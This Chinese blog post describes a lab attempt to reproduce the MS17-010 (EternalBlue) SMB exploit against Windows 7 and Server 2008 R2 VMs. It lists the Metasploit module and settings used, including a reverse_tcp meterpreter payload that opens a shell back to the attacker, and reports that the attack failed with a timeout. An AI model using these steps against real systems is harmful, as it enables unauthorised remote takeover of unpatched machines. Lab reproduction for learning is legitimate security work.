关于MS17-010漏洞利用失败的总结尝试和看法—Hack之路

关于MS17-010漏洞利用
      关于MS17-101(永恒之蓝)的利用并不难,但是小编在复现的时候还是遇到了很多的问题
关于漏洞过程
      我们先准备了两个镜像,2008R2,win7两台测试虚拟机,分别关闭防火墙并开启远程连接

关于MS17-010漏洞利用失败的总结尝试和看法---Hack之路       关于MS17-010漏洞利用失败的总结尝试和看法---Hack之路
我们打开MSF框架输入命令:
先搜索可利用的模块
search ms17-101我们会搜索到4个模块,我们选择 windows/smb/ms17_010_eternalblue模块
use windows/smb/ms17_010_eternalblue
选择模块之后,查看参数并设置参数
set RHOST //设置靶机ip也就是被攻击的ip
set LHOST //设置自己的ip
set LPORT //设置回弹shell的端口
set Payload //设置攻击荷载(windows/x64/meterpreter/reverse_tcp)

关于MS17-010漏洞利用失败的总结尝试和看法---Hack之路
设置之后,命令run开始攻击,小编在攻击时爆出最后一段攻击碎片无法发送到靶机,所以导致攻击失败,在小编种种尝试下(更换攻击荷载,更换攻击模块)和搜索资料升级MSF框架后依然无果,最后没有尝试的是更换win7老版本,目测可能是小编的win7和2008r2系统是已经打过补丁的镜像所以攻击失败,大家如果也想尝试,请找未打补丁的靶机进行测试哦
关于MS17-010漏洞利用失败的总结尝试和看法---Hack之路
小编报错
(Read timeout expired when reading from the socket(timeout=30)
有一样苦恼的,或者遇到过并解决的小伙伴,可以在评论区评论哦

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/15/%e5%85%b3%e4%ba%8ems17-010%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8%e5%a4%b1%e8%b4%a5%e7%9a%84%e6%80%bb%e7%bb%93%e5%b0%9d%e8%af%95%e5%92%8c%e7%9c%8b%e6%b3%95-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注